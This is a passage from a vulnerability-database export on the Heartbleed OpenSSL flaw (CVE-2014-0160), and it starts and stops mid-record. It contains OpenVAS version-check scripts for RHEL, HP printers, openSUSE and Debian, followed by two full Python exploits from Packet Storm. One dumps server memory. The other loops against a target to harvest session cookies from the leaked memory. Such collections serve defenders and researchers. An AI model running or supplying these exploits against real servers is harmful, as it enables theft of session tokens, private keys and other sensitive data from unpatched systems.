script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-06T16:43:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "A potential security vulnerability has been identified in HP Officejet\n Pro X printers and in certain Officejet Pro printers running OpenSSL. This is the OpenSSL\n vulnerability known as ", "modified": "2019-12-05T00:00:00", "published": "2014-06-03T00:00:00", "id": "OPENVAS:1361412562310105040", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105040", "type": "openvas", "title": "HP Officejet Pro X Printers, Certain Officejet Pro Printers, Remote Disclosure of Information", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP Officejet Pro X Printers, Certain Officejet Pro Printers, Remote Disclosure of Information\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105040\");\n script_bugtraq_id(66690);\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2019-12-05T15:10:00+0000\");\n\n script_name(\"HP Officejet Pro X Printers, Certain Officejet Pro Printers, Remote Disclosure of Information\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/531993\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-06-03 16:01:41 +0200 (Tue, 03 Jun 2014)\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_hp_printer_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"hp_fw_ver\", \"hp_model\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit these issues to gain access to sensitive\n information that may aid in further attacks.\");\n\n script_tag(name:\"vuldetect\", value:\"Check the firmware version.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory\n for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"A potential security vulnerability has been identified in HP Officejet\n Pro X printers and in certain Officejet Pro printers running OpenSSL. This is the OpenSSL\n vulnerability known as 'Heartbleed' (CVE-2014-0160) which could be exploited remotely\n resulting in disclosure of information.\");\n\n script_tag(name:\"affected\", value:\"HP Officejet Pro X451dn < BNP1CN1409BR\n\nHP Officejet Pro X451dw < BWP1CN1409BR\n\nHP Officejet Pro X551dw < BZP1CN1409BR\n\nHP Officejet Pro X476dn < LNP1CN1409BR\n\nHP Officejet Pro X476dw < LWP1CN1409BR\n\nHP Officejet Pro X576dw < LZP1CN1409BR\n\nHP Officejet Pro 276dw < FRP1CN1416BR\n\nHP Officejet Pro 251dw < EVP1CN1416BR\n\nHP Officejet Pro 8610 < FDP1CN1416AR\n\nHP Officejet Pro 8615 < FDP1CN1416AR\n\nHP Officejet Pro 8620 < FDP1CN1416AR\n\nHP Officejet Pro 8625 < FDP1CN1416AR\n\nHP Officejet Pro 8630 < FDP1CN1416AR\n\nHP Officejet Pro 8640 < FDP1CN1416AR\n\nHP Officejet Pro 8660 < FDP1CN1416AR\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nport = get_kb_item( \"hp_printer/port\" );\nif( ! port ) port = 0;\n\nfw_ver = get_kb_item( \"hp_fw_ver\" );\nif( ! fw_ver ) exit( 0 );\n\nmodel = get_kb_item( \"hp_model\" );\nif( ! model ) exit( 0 );\n\nif(\"Officejet Pro X451dn\" >< model ) fixed_ver = 'BNP1CN1409BR';\nelse if( \"Officejet Pro X451dw\" >< model ) fixed_ver = 'BWP1CN1409BR';\nelse if( \"Officejet Pro X551dw\" >< model ) fixed_ver = 'BZP1CN1409BR';\nelse if( \"Officejet Pro X476dn\" >< model ) fixed_ver = 'LNP1CN1409BR';\nelse if( \"Officejet Pro X476dw\" >< model ) fixed_ver = 'LWP1CN1409BR';\nelse if( \"Officejet Pro X576dw\" >< model ) fixed_ver = 'LZP1CN1409BR';\nelse if( \"Officejet Pro 276dw\" >< model ) fixed_ver = 'FRP1CN1416BR';\nelse if( \"Officejet Pro 251dw\" >< model ) fixed_ver = 'EVP1CN1416BR';\nelse if( \"Officejet Pro 8610\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8615\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8620\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8625\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8630\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8640\" >< model ) fixed_ver = 'FDP1CN1416AR';\nelse if( \"Officejet Pro 8660\" >< model ) fixed_ver = 'FDP1CN1416AR';\n\nif( ! fixed_ver ) exit( 0 );\n\nfw_build = int( substr( fw_ver, 6, 9 ) );\nfixed_build = int( substr( fixed_ver, 6, 9 ) );\n\nif( fw_build < fixed_build )\n{\n report = 'Detected Firmware: ' + fw_ver + '\\nFixed Firmware: ' + fixed_ver + '\\n';\n security_message(port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T18:39:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2014-04-10T00:00:00", "id": "OPENVAS:1361412562310850582", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850582", "type": "openvas", "title": "openSUSE: Security Advisory for update (openSUSE-SU-2014:0492-1)", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850582\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:36:01 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"openSUSE: Security Advisory for update (openSUSE-SU-2014:0492-1)\");\n\n script_tag(name:\"affected\", value:\"update on openSUSE 13.1, openSUSE 12.3\");\n\n script_tag(name:\"insight\", value:\"This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0492-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE12\\.3|openSUSE13\\.1)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1e~1.44.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1e~11.32.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-03-20T16:44:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "A vulnerability has been discovered\nin OpenSSL", "modified": "2018-03-19T00:00:00", "published": "2014-04-07T00:00:00", "id": "OPENVAS:702896", "href": "http://plugins.openvas.org/nasl.php?oid=702896", "type": "openvas", "title": "Debian Security Advisory DSA 2896-1 (openssl - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2896.nasl 9136 2018-03-19 13:08:02Z cfischer $\n# Auto-generated from advisory DSA 2896-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(702896);\n script_version(\"$Revision: 9136 $\");\n script_cve_id(\"CVE-2014-0160\");\n script_name(\"Debian Security Advisory DSA 2896-1 (openssl - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-03-19 14:08:02 +0100 (Mon, 19 Mar 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-04-07 00:00:00 +0200 (Mon, 07 Apr 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2896.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"openssl on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package contains the openssl binary and related tools.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthis problem has been fixed in version 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\");\n script_tag(name: \"summary\", value: \"A vulnerability has been discovered\nin OpenSSL's support for the TLS/DTLS Heartbeat extension. Up to 64KB of memory\nfrom either client or server can be recovered by an attacker. This vulnerability\nmight allow an attacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:28", "description": "", "published": "2014-04-09T00:00:00", "type": "packetstorm", "title": "Heartbleed User Session Extraction", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "PACKETSTORM:126069", "href": "https://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html", "sourceData": "`#!/usr/bin/python \n \n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. \n# Michael Davis (mike.philip.davis@gmail.com) \n \n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n \n# The author disclaims copyright to this source code. \n \nimport select \nimport sys \nimport string \nimport struct \nimport socket \nimport time \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)') \n \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \n \nclass HeartBleeder(object): \n \nserver_response = None \nsocket = None \nhostname = '' \nport = 443 \nfound_sessions = set() \ncookie = 'session' \ncookie_length = 56 \n \ndef __init__(self, hostname='', cookie=''): \nself.hostname = hostname \nself.cookie = cookie \n \ndef connect(self): \n\"\"\" \nConnects to the remote server. \n\"\"\" \nself.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsys.stdout.flush() \nself.socket.connect((self.hostname, self.port)) \nsys.stdout.flush() \nself.socket.send(hello) \nsys.stdout.flush() \n \ndef rcv_response(self): \nwhile True: \n_type, version, payload = self.rcv_message() \nif _type is None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif _type == 22 and ord(payload[0]) == 0x0E: \nbreak \n \ndef rcv_message(self): \n \nrecord_header = self.rcv_all(5) \nif record_header is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \n_type, version, line = struct.unpack('>BHH', record_header) \npayload = self.rcv_all(line, 10) \nif payload is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \n# print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn _type, version, payload \n \ndef rcv_all(self, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([self.socket], [], [], 5) \nif self.socket in r: \ndata = self.socket.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \ndef try_heartbeat(self): \nself.socket.send(hb) \nwhile True: \n_type, version, self.payload = self.rcv_message() \nif _type is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif _type == 24: \n# print 'Received heartbeat response:' \nself.parse_response() \nif len(self.payload) > 3: \npass \n# print 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif _type == 21: \nprint 'Received alert:' \nself.hexdump(self.payload) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef parse_response(self): \n\"\"\" \nParses the response from the server for a session id. \n\"\"\" \nascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload) \nindex = string.find(ascii, self.cookie) \nif index >= 0: \ninfo = ascii[index:index + self.cookie_length] \nsession = info.split(' ')[0] \nsession = string.replace(session, ';', '') \nif session not in self.found_sessions: \nself.found_sessions.add(session) \nprint session \n \ndef hexdump(self, payload): \n\"\"\" \nPrints out a hexdump in the event that server returns an error. \n\"\"\" \nfor b in xrange(0, len(payload), 16): \nline = [c for c in payload[b:b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in line) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef scan(self): \nself.connect() \nself.rcv_response() \nself.try_heartbeat() \n \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ncookies_str = 'session' \nif len(args) > 1: \ncookies_str = args[1] \n \nprint cookies_str \n \nwhile True: \nheartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str) \nheartbeat.scan() \n \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126069/heartbleed-altered.py.txt"}, {"lastseen": "2016-12-05T22:25:07", "description": "", "published": "2014-04-08T00:00:00", "type": "packetstorm", "title": "OpenSSL TLS Heartbeat Extension Memory Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "PACKETSTORM:126065", "href": "https://packetstormsecurity.com/files/126065/OpenSSL-TLS-Heartbeat-Extension-Memory-Disclosure.html", "sourceData": "`#!/usr/bin/python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nhello = h2bin(''' \n16 03 02 00 dc 01 00 00 d8 03 02 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \n \nhb = h2bin(''' \n18 03 02 00 03 \n01 40 00 \n''') \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(hello) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(hb) \nhit_hb(s) \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 5.0, "vector": 